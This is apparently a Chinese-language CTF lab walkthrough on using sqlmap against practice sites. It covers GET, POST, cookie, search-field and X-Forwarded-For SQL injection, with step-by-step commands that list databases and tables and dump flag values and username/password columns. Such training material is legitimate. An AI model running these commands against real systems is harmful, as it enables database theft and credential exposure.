Sqlmap

1、Sqlmap對get請求數字型、字元型注入## 标題

2、sqlmap對Get請求注入

對http://www.whalwl.host:8001/bug/sql_injection/sql_num.php進行get注入

指令

python sqlmap.py -u ”http://www.whalwl.host:8001/bug/sql_injection/sql_num.php?id=1&submit=submit” --dbs

查詢dwvs庫表名

指令：

python sqlmap.py -u ”http://www.whalwl.host:8001/bug/sql_injection/sql_num.php?id=1&submit=submit” -D dwvs --tables
           

查dwvs庫中flag表的字段名

指令：

python sqlmap.py -u ”http://www.whalwl.host:8001/bug/sql_injection/sql_num.php?id=1&submit=submit” -D dwvs -T flag --columns
           

顯示flag表中flag字段

指令：

python sqlmap.py -u ”http://www.whalwl.host:8001/bug/sql_injection/sql_num.php?id=1&submit=submit” -D dwvs -T flag -C flag --dump
           

Sqlmap對post請求注入

首先用burp進行抓包

将封包複制粘貼在1.txt 将1.txt放入

指令：

python sqlmap.py -r 1.txt
           

查庫

指令：

python sqlmap.py -r 1.txt --dbs
           

查test庫中表名

指令：

python sqlmap.py -r 1.txt -D test --tables
           

查wan表中字段

指令：

Python sqlmap.py -r 1.txt -D test -T wan --columns
           

顯示字段

指令：

Python sqlmap.py -r 1.txt -D test -T wan -C username,password --dump
           

2、對此網站進行sqlmap cookie注入

http://www.whalwl.host:8009/user.php?id=1

指令：

Python sqlmap.py -u “http://www.whalwl.host:8009/user.php?” --cookie “id=1” --level 2 --tables
           

查this_flag字段

指令：

python sqlmap.py -u "http://www.whalwl.host:8009/user.php?" --cookie "id=1"  --level 2 -T this_flag --columns
           

檢視flag值

指令：

python sqlmap.py -u "http://www.whalwl.host:8009/user.php?" --cookie "id=1"  --level 2 -T this_flag -C flag --dump
           

3、Sqlmap搜尋型注入

http://www.whalwl.host:8002/search.php

查資料庫

指令：

python sqlmap.py -u "http://www.whalwl.host:8002/search.php?search=21" --dbs
           

查dwvs庫表名

指令：

python sqlmap.py -u "http://www.whalwl.host:8002/search.php?search=21" -D dwvs --tables
           

查flag字段

指令:

python sqlmap.py -u "http://www.whalwl.host:8002/search.php?search=21" -D dwvs -T flag --columns
           

flag值

指令：

python sqlmap.py -u "http://www.whalwl.host:8002/search.php?search=21" -D dwvs -T flag -C flag --dump
           

4、X-Forwarded-For注入 手工注入和sqlmap注入

1、Sqlmap注入

Burp抓包

并添加

X-Forwarded-for: 8.8.8.8*

複制粘貼至1.TXT

指令：

python sqlmap.py -r 1.txt --dbs
           

指令：

python sqlmap.py -r 1.txt -D xff --tables
           

指令：

python sqlmap.py -r 1.txt -D xff -T this_flag --columns
           

指令：

python sqlmap.py -r 1.txt -D xff -T this_flag -C flag --dump
           

2、手工注入

連結：

https://blog.csdn.net/mutou990/article/details/107761999